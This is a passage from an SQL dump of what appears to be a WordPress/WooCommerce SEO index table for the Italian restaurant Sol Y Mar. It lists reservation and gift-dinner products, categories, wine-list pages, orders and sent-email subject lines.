2018','draft',0,0,NULL,NULL,NULL,NULL,NULL,30,0,0,0,0,0,0,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2016/11/tavolo-riservato.png',NULL,'212','featured-image',NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2016/11/tavolo-riservato.png','212','featured-image','{\"width\":235,\"height\":158,\"url\":\"https:\\/\\/www.ristorantesolymar.it\\/wp-content\\/uploads\\/2016\\/11\\/tavolo-riservato.png\",\"path\":\"\\/home\\/baltazar\\/ristorantesolymar.it\\/wp-content\\/uploads\\/2016\\/11\\/tavolo-riservato.png\",\"size\":\"full\",\"id\":212,\"alt\":\"\",\"pixels\":37130,\"type\":\"image\\/png\"}',0,0,NULL,'2020-06-05 14:29:17','2020-10-15 00:01:29',1,NULL,NULL,NULL,NULL,0,NULL),(162,NULL,NULL,216,'post','product',1,0,NULL,NULL,'Prenotazione Tavolo per 4 Persone &#8211; Capodanno 2018','draft',0,0,NULL,NULL,NULL,NULL,NULL,30,0,0,0,0,0,0,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2016/11/tavolo-riservato.png',NULL,'212','featured-image',NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2016/11/tavolo-riservato.png','212','featured-image','{\"width\":235,\"height\":158,\"url\":\"https:\\/\\/www.ristorantesolymar.it\\/wp-content\\/uploads\\/2016\\/11\\/tavolo-riservato.png\",\"path\":\"\\/home\\/baltazar\\/ristorantesolymar.it\\/wp-content\\/uploads\\/2016\\/11\\/tavolo-riservato.png\",\"size\":\"full\",\"id\":212,\"alt\":\"\",\"pixels\":37130,\"type\":\"image\\/png\"}',0,0,NULL,'2020-06-05 14:29:17','2020-10-15 00:01:29',1,NULL,NULL,NULL,NULL,0,NULL),(163,NULL,NULL,220,'post','product',1,0,NULL,NULL,'Prenotazione Tavolo per 6 Persone &#8211; Capodanno 2018','draft',0,0,NULL,NULL,NULL,NULL,NULL,60,0,0,0,0,0,0,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2016/11/tavolo-riservato.png',NULL,'212','featured-image',NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2016/11/tavolo-riservato.png','212','featured-image','{\"width\":235,\"height\":158,\"url\":\"https:\\/\\/www.ristorantesolymar.it\\/wp-content\\/uploads\\/2016\\/11\\/tavolo-riservato.png\",\"path\":\"\\/home\\/baltazar\\/ristorantesolymar.it\\/wp-content\\/uploads\\/2016\\/11\\/tavolo-riservato.png\",\"size\":\"full\",\"id\":212,\"alt\":\"\",\"pixels\":37130,\"type\":\"image\\/png\"}',0,0,NULL,'2020-06-05 14:29:17','2020-10-15 00:01:29',1,NULL,NULL,NULL,NULL,0,NULL),(164,NULL,NULL,244,'post','product',1,0,NULL,NULL,'Prenotazione Tavolo per 5 Persone','draft',0,0,NULL,NULL,NULL,NULL,NULL,60,0,0,0,0,0,0,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2016/11/tavolo-riservato.png',NULL,'212','featured-image',NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2016/11/tavolo-riservato.png','212','featured-image','{\"width\":235,\"height\":158,\"url\":\"https:\\/\\/www.ristorantesolymar.it\\/wp-content\\/uploads\\/2016\\/11\\/tavolo-riservato.png\",\"path\":\"\\/home\\/baltazar\\/ristorantesolymar.it\\/wp-content\\/uploads\\/2016\\/11\\/tavolo-riservato.png\",\"size\":\"full\",\"id\":212,\"alt\":\"\",\"pixels\":37130,\"type\":\"image\\/png\"}',0,0,NULL,'2020-06-05 14:29:17','2020-10-15 00:01:29',1,NULL,NULL,NULL,NULL,0,NULL),(165,NULL,NULL,482,'post','product',1,0,NULL,NULL,'Acquista Pranzo/Cena: Menù creativo per 2 persone','draft',0,0,NULL,NULL,NULL,NULL,NULL,30,0,0,0,0,0,0,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2017/07/be-the-reason.jpg',NULL,'470','featured-image',NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2017/07/be-the-reason.jpg','470','featured-image','{\"width\":564,\"height\":415,\"url\":\"https:\\/\\/www.ristorantesolymar.it\\/wp-content\\/uploads\\/2017\\/07\\/be-the-reason.jpg\",\"path\":\"\\/home\\/baltazar\\/ristorantesolymar.it\\/wp-content\\/uploads\\/2017\\/07\\/be-the-reason.jpg\",\"size\":\"full\",\"id\":470,\"alt\":\"\",\"pixels\":234060,\"type\":\"image\\/jpeg\"}',0,0,NULL,'2020-06-05 14:29:17','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(166,NULL,NULL,483,'post','product',1,0,NULL,NULL,'Acquista Pranzo/Cena: Menù creativo per 2 persone + Bevande','draft',0,0,NULL,NULL,NULL,NULL,NULL,60,0,0,0,0,0,0,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2017/07/be-the-reason.jpg',NULL,'470','featured-image',NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2017/07/be-the-reason.jpg','470','featured-image','{\"width\":564,\"height\":415,\"url\":\"https:\\/\\/www.ristorantesolymar.it\\/wp-content\\/uploads\\/2017\\/07\\/be-the-reason.jpg\",\"path\":\"\\/home\\/baltazar\\/ristorantesolymar.it\\/wp-content\\/uploads\\/2017\\/07\\/be-the-reason.jpg\",\"size\":\"full\",\"id\":470,\"alt\":\"\",\"pixels\":234060,\"type\":\"image\\/jpeg\"}',0,0,NULL,'2020-06-05 14:29:17','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(167,NULL,NULL,484,'post','product',1,0,NULL,NULL,'Acquista Pranzo/Cena: Menù storico per 2 persone','draft',0,0,NULL,NULL,NULL,NULL,NULL,30,0,0,0,0,0,0,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2017/07/be-the-reason.jpg',NULL,'470','featured-image',NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2017/07/be-the-reason.jpg','470','featured-image','{\"width\":564,\"height\":415,\"url\":\"https:\\/\\/www.ristorantesolymar.it\\/wp-content\\/uploads\\/2017\\/07\\/be-the-reason.jpg\",\"path\":\"\\/home\\/baltazar\\/ristorantesolymar.it\\/wp-content\\/uploads\\/2017\\/07\\/be-the-reason.jpg\",\"size\":\"full\",\"id\":470,\"alt\":\"\",\"pixels\":234060,\"type\":\"image\\/jpeg\"}',0,0,NULL,'2020-06-05 14:29:17','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(168,NULL,NULL,485,'post','product',1,0,NULL,NULL,'Acquista Pranzo/Cena: Menù storico per 2 persone + Bevande','draft',0,0,NULL,NULL,NULL,NULL,NULL,30,0,0,0,0,0,0,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2017/07/be-the-reason.jpg',NULL,'470','featured-image',NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2017/07/be-the-reason.jpg','470','featured-image','{\"width\":564,\"height\":415,\"url\":\"https:\\/\\/www.ristorantesolymar.it\\/wp-content\\/uploads\\/2017\\/07\\/be-the-reason.jpg\",\"path\":\"\\/home\\/baltazar\\/ristorantesolymar.it\\/wp-content\\/uploads\\/2017\\/07\\/be-the-reason.jpg\",\"size\":\"full\",\"id\":470,\"alt\":\"\",\"pixels\":234060,\"type\":\"image\\/jpeg\"}',0,0,NULL,'2020-06-05 14:29:17','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(169,NULL,NULL,290,'post','product',1,0,NULL,NULL,'Prenotazione Tavolo per 4 Persone San Valentino','pending',0,0,NULL,NULL,NULL,NULL,NULL,90,0,0,0,0,0,0,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2016/11/tavolo-riservato.png',NULL,'212','featured-image',NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2016/11/tavolo-riservato.png','212','featured-image','{\"width\":235,\"height\":158,\"url\":\"https:\\/\\/www.ristorantesolymar.it\\/wp-content\\/uploads\\/2016\\/11\\/tavolo-riservato.png\",\"path\":\"\\/home\\/baltazar\\/ristorantesolymar.it\\/wp-content\\/uploads\\/2016\\/11\\/tavolo-riservato.png\",\"size\":\"full\",\"id\":212,\"alt\":\"\",\"pixels\":37130,\"type\":\"image\\/png\"}',0,0,NULL,'2020-06-05 14:29:17','2020-10-15 00:01:29',1,NULL,NULL,NULL,NULL,0,NULL),(170,'https://www.ristorantesolymar.it/vecchio/prodotto/prenotazione-tavolo-per-2-persone-pasqua/','91:cff9c4d4d737bb88985b27449549fd9b',322,'post','product',1,0,NULL,NULL,'Prenotazione Tavolo per 2 Persone &#8211; Pasqua','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,90,0,0,0,0,0,0,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2016/11/tavolo-riservato.png',NULL,'212','featured-image',NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2016/11/tavolo-riservato.png','212','featured-image','{\"width\":235,\"height\":158,\"url\":\"https:\\/\\/www.ristorantesolymar.it\\/wp-content\\/uploads\\/2016\\/11\\/tavolo-riservato.png\",\"path\":\"\\/home\\/baltazar\\/ristorantesolymar.it\\/wp-content\\/uploads\\/2016\\/11\\/tavolo-riservato.png\",\"size\":\"full\",\"id\":212,\"alt\":\"\",\"pixels\":37130,\"type\":\"image\\/png\"}',0,15,NULL,'2020-06-05 14:29:17','2021-02-02 22:41:25',1,NULL,NULL,NULL,NULL,0,NULL),(171,'https://www.ristorantesolymar.it/vecchio/prodotto/prenotazione-tavolo-per-4-persone-pasqua/','91:57e00afcaedb01a9270b74e500e3aedc',324,'post','product',1,0,NULL,NULL,'Prenotazione Tavolo per 4 Persone &#8211; Pasqua','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,90,0,0,0,0,0,0,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2016/11/tavolo-riservato.png',NULL,'212','featured-image',NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2016/11/tavolo-riservato.png','212','featured-image','{\"width\":235,\"height\":158,\"url\":\"https:\\/\\/www.ristorantesolymar.it\\/wp-content\\/uploads\\/2016\\/11\\/tavolo-riservato.png\",\"path\":\"\\/home\\/baltazar\\/ristorantesolymar.it\\/wp-content\\/uploads\\/2016\\/11\\/tavolo-riservato.png\",\"size\":\"full\",\"id\":212,\"alt\":\"\",\"pixels\":37130,\"type\":\"image\\/png\"}',0,12,NULL,'2020-06-05 14:29:17','2021-02-21 00:45:21',1,NULL,NULL,NULL,NULL,0,NULL),(172,'https://www.ristorantesolymar.it/vecchio/prodotto/menu-creativo-2-persone/','74:7e623d0374fb71b1ff3815ca950c3f8b',435,'post','product',1,0,NULL,NULL,'Regala cena: Menù Creativo per 2 persone','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,90,0,0,0,0,0,0,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2017/07/be-the-reason.jpg',NULL,'470','featured-image',NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2017/07/be-the-reason.jpg','470','featured-image','{\"width\":564,\"height\":415,\"url\":\"https:\\/\\/www.ristorantesolymar.it\\/wp-content\\/uploads\\/2017\\/07\\/be-the-reason.jpg\",\"path\":\"\\/home\\/baltazar\\/ristorantesolymar.it\\/wp-content\\/uploads\\/2017\\/07\\/be-the-reason.jpg\",\"size\":\"full\",\"id\":470,\"alt\":\"\",\"pixels\":234060,\"type\":\"image\\/jpeg\"}',0,8,NULL,'2020-06-05 14:29:17','2021-03-08 13:29:14',1,NULL,NULL,NULL,NULL,0,NULL),(173,'https://www.ristorantesolymar.it/vecchio/prodotto/regala-cena-menu-creativo-per-2-persone-con-bevande/','102:c970d4e822d4a0a00e757b8efffe89c9',472,'post','product',1,0,NULL,NULL,'Regala cena: Menù Creativo per 2 persone + Bevande','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,90,0,0,0,0,0,0,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2017/07/be-the-reason.jpg',NULL,'470','featured-image',NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2017/07/be-the-reason.jpg','470','featured-image','{\"width\":564,\"height\":415,\"url\":\"https:\\/\\/www.ristorantesolymar.it\\/wp-content\\/uploads\\/2017\\/07\\/be-the-reason.jpg\",\"path\":\"\\/home\\/baltazar\\/ristorantesolymar.it\\/wp-content\\/uploads\\/2017\\/07\\/be-the-reason.jpg\",\"size\":\"full\",\"id\":470,\"alt\":\"\",\"pixels\":234060,\"type\":\"image\\/jpeg\"}',0,8,NULL,'2020-06-05 14:29:17','2021-02-18 15:29:35',1,NULL,NULL,NULL,NULL,0,NULL),(174,'https://www.ristorantesolymar.it/vecchio/prodotto/regala-cena-menu-storico-per-2-persone/','89:136b7704a90c9e1d8b08533331901848',474,'post','product',1,0,NULL,NULL,'Regala cena: Menù Storico per 2 persone','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,90,0,0,0,0,0,0,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2017/07/be-the-reason.jpg',NULL,'470','featured-image',NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2017/07/be-the-reason.jpg','470','featured-image','{\"width\":564,\"height\":415,\"url\":\"https:\\/\\/www.ristorantesolymar.it\\/wp-content\\/uploads\\/2017\\/07\\/be-the-reason.jpg\",\"path\":\"\\/home\\/baltazar\\/ristorantesolymar.it\\/wp-content\\/uploads\\/2017\\/07\\/be-the-reason.jpg\",\"size\":\"full\",\"id\":470,\"alt\":\"\",\"pixels\":234060,\"type\":\"image\\/jpeg\"}',0,6,NULL,'2020-06-05 14:29:17','2021-02-21 17:41:12',1,NULL,NULL,NULL,NULL,0,NULL),(175,'https://www.ristorantesolymar.it/vecchio/prodotto/gift-card-50/','63:5409a65d724b9f37edb5838832dbc686',475,'post','product',1,0,NULL,NULL,'Gift Card 50 euro','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,30,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2017/07/be-the-reason.jpg',NULL,'470','featured-image',NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2017/07/be-the-reason.jpg','470','featured-image','{\"width\":564,\"height\":415,\"url\":\"https://www.ristorantesolymar.it/wp-content/uploads/2017/07/be-the-reason.jpg\",\"path\":\"/home/baltazar/ristorantesolymar.it/wp-content/uploads/2017/07/be-the-reason.jpg\",\"size\":\"full\",\"id\":470,\"alt\":\"\",\"pixels\":234060,\"type\":\"image/jpeg\"}',0,5,NULL,'2020-06-05 14:29:17','2021-02-07 02:48:16',1,NULL,NULL,NULL,NULL,0,1),(176,'https://www.ristorantesolymar.it/vecchio/prodotto/prenotazione-tavolo-per-6-persone-pasqua/','91:530c2ac0bd310e3485dee294dbf29ccb',630,'post','product',1,0,NULL,NULL,'Prenotazione Tavolo per 6 Persone &#8211; Pasqua','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,90,0,0,0,0,0,0,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2016/11/tavolo-riservato.png',NULL,'212','featured-image',NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2016/11/tavolo-riservato.png','212','featured-image','{\"width\":235,\"height\":158,\"url\":\"https:\\/\\/www.ristorantesolymar.it\\/wp-content\\/uploads\\/2016\\/11\\/tavolo-riservato.png\",\"path\":\"\\/home\\/baltazar\\/ristorantesolymar.it\\/wp-content\\/uploads\\/2016\\/11\\/tavolo-riservato.png\",\"size\":\"full\",\"id\":212,\"alt\":\"\",\"pixels\":37130,\"type\":\"image\\/png\"}',0,3,NULL,'2020-06-05 14:29:17','2021-02-19 16:01:46',1,NULL,NULL,NULL,NULL,0,NULL),(177,'https://www.ristorantesolymar.it/vecchio/category/eventi/','57:f2bd563019231c88ad1900fae6d99c6c',1,'term','category',NULL,NULL,NULL,NULL,'Eventi',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2020-06-05 14:29:19','2021-02-01 04:08:27',1,NULL,NULL,NULL,NULL,0,NULL),(178,NULL,NULL,7,'term','product_cat',NULL,NULL,NULL,NULL,'Capodanno',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2020-06-05 14:29:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(179,'https://www.ristorantesolymar.it/vecchio/categoria-prodotto/regala-cena/','72:644c484561c7662e7c09be2cde2fd2ea',23,'term','product_cat',NULL,NULL,'Acquista e Regala una cena al Sol Y Mar - Coupon idee regalo',NULL,'Regala Cena',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,60,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2020-06-05 14:29:19','2021-02-01 07:07:42',1,NULL,NULL,NULL,NULL,0,NULL),(180,'https://www.ristorantesolymar.it/vecchio/categoria-prodotto/coupon/','67:c1ce360fbe80b5e26f26e0e4aba9bbc7',25,'term','product_cat',NULL,NULL,NULL,NULL,'Coupon',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2020-06-05 14:29:19','2021-02-20 16:42:23',1,NULL,NULL,NULL,NULL,0,NULL),(181,'https://www.ristorantesolymar.it/vecchio/categoria-prodotto/caparra/','68:e01878e0882b90096bdcf8ac820e10e0',27,'term','product_cat',NULL,NULL,NULL,NULL,'Caparra',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2020-06-05 14:29:19','2021-02-05 05:54:10',1,NULL,NULL,NULL,NULL,0,NULL),(182,'https://www.ristorantesolymar.it/vecchio/categoria-prodotto/mwb_wgm_giftcard/','77:774422ff5c7debad4ad039cfca5a717d',28,'term','product_cat',NULL,NULL,NULL,NULL,'Gift Card',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2020-06-05 14:29:19','2021-02-05 05:54:50',1,NULL,NULL,NULL,NULL,0,NULL),(183,'https://www.ristorantesolymar.it/vecchio/negozio/','49:691c1e0242d9ef2e160428d18f3957ca',NULL,'post-type-archive','product',NULL,NULL,'','','Prodotti',NULL,1,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2020-06-05 14:29:21','2021-02-14 22:35:05',1,NULL,NULL,NULL,NULL,0,NULL),(184,NULL,NULL,NULL,'system-page','search-result',NULL,NULL,'Si è cercato %%searchphrase%% %%page%% %%sep%% %%sitename%%',NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,1,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2020-06-05 14:29:23','2020-07-02 23:48:53',1,NULL,NULL,NULL,NULL,0,NULL),(185,NULL,NULL,967,'post','shop_order',1,0,NULL,NULL,'Order &ndash; June 5, 2020 @ 06:19 PM','wc-processing',0,1,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2020-06-05 16:19:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(186,NULL,NULL,968,'post','shop_coupon',0,0,NULL,NULL,'solymarcouponMN9H0','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2020-06-05 16:22:11','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(187,NULL,NULL,62,'user',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,'https://secure.gravatar.com/avatar/767e77ddc27f56f63fdef4b280311b4f?s=500&d=mm&r=g',NULL,NULL,'gravatar-image',NULL,NULL,'https://secure.gravatar.com/avatar/767e77ddc27f56f63fdef4b280311b4f?s=500&d=mm&r=g',NULL,'gravatar-image',NULL,NULL,NULL,NULL,'2020-06-08 16:30:47','2020-10-15 00:01:29',1,NULL,NULL,NULL,NULL,0,NULL),(188,NULL,NULL,63,'user',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,'https://secure.gravatar.com/avatar/4a0ee11fa2986c68c47c75202426d108?s=500&d=mm&r=g',NULL,NULL,'gravatar-image',NULL,NULL,'https://secure.gravatar.com/avatar/4a0ee11fa2986c68c47c75202426d108?s=500&d=mm&r=g',NULL,'gravatar-image',NULL,NULL,NULL,NULL,'2020-06-08 16:39:14','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2618,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-31/','124:05544a0079edc0680ea806304f2686d1',4645,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-03-23 12:27:46','2021-03-23 16:27:46',1,NULL,NULL,NULL,NULL,0,NULL),(2621,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-34/','124:fa84ff5ab90b7a369d576a58abb18c7a',4648,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-03-27 13:19:13','2021-03-27 17:19:13',1,NULL,NULL,NULL,NULL,0,NULL),(2622,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-35/','124:1f71c0e74b2801c9438be0f10ebc1503',4649,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-03-29 14:45:11','2021-03-29 18:45:11',1,NULL,NULL,NULL,NULL,0,NULL),(193,'https://www.ristorantesolymar.it/vecchio/i-piccoli-formati-da-0375/','67:426b51b2a9ce5fd6c7664f06cc13f983',977,'post','page',2,0,NULL,NULL,'I PICCOLI FORMATI DA 0,375','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,0,NULL,'2020-06-10 12:39:14','2021-01-31 21:17:13',1,NULL,NULL,NULL,NULL,0,NULL),(197,'https://www.ristorantesolymar.it/vecchio/carta-dei-vini/germania/','65:a22cc6accfe48a00457d4b27aaa8c0c4',1003,'post','page',2,22,NULL,NULL,'Germania','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,1,NULL,'2020-06-10 13:26:23','2021-01-31 22:48:03',1,NULL,NULL,NULL,NULL,1,NULL),(198,'https://www.ristorantesolymar.it/vecchio/carta-dei-vini/francia-2/','66:7d6f4e74aee48d3b97ebf2ee41f17d66',1005,'post','page',2,22,NULL,NULL,'Francia','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,1,NULL,'2020-06-10 13:29:15','2021-01-31 22:48:00',1,NULL,NULL,NULL,NULL,1,NULL),(199,'https://www.ristorantesolymar.it/vecchio/carta-dei-vini/vini-rosati/','68:8fccab3302afb0b8f650f33c590b67fb',1009,'post','page',2,22,NULL,NULL,'Vini Rosati','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,1,NULL,'2020-06-10 13:38:18','2021-01-31 22:47:57',1,NULL,NULL,NULL,NULL,1,NULL),(204,NULL,NULL,896,'post','shop_order',1,0,NULL,NULL,'Protetto: Order &ndash; Ottobre 31, 2019 @ 01:31 PM','wc-cancelled',0,1,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2020-06-17 07:57:37','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(205,NULL,NULL,929,'post','shop_order',1,0,NULL,NULL,'Protetto: Order &ndash; Dicembre 23, 2019 @ 04:46 PM','wc-cancelled',0,1,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2020-06-17 07:57:37','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(206,NULL,NULL,931,'post','shop_order',1,0,NULL,NULL,'Protetto: Order &ndash; Dicembre 23, 2019 @ 05:07 PM','wc-cancelled',0,1,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2020-06-17 07:57:37','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(207,NULL,NULL,959,'post','shop_order',1,0,NULL,NULL,'Protetto: Order &ndash; Febbraio 11, 2020 @ 12:40 PM','wc-cancelled',0,1,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2020-06-17 07:57:37','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(208,NULL,NULL,963,'post','shop_order',1,0,NULL,NULL,'Protetto: Order &ndash; Febbraio 11, 2020 @ 07:20 PM','wc-cancelled',0,1,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2020-06-17 07:57:38','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(219,NULL,NULL,1025,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: Da sito Sol Y Mar: &#8220;Richiesta prenotazione&#8221;','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2020-06-22 16:15:36','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(220,NULL,NULL,1026,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: Da sito Sol Y Mar: &#8220;Prenotazione tavoli per 2&#8221;','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2020-06-24 15:59:59','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(221,NULL,NULL,1027,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: Da sito Sol Y Mar: &#8220;Info&#8221;','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2020-06-25 11:13:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(222,NULL,NULL,1028,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: Da sito Sol Y Mar: &#8220;Prenotazione ristorante Dove posti per la cena del 25 giugno 2020 giovedì&#8221;','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2020-06-25 11:29:44','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(223,NULL,NULL,1029,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: Da sito Sol Y Mar: &#8220;Richiesta prenotazione per 2 27 giugno&#8221;','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2020-06-25 19:02:32','2021-01-29 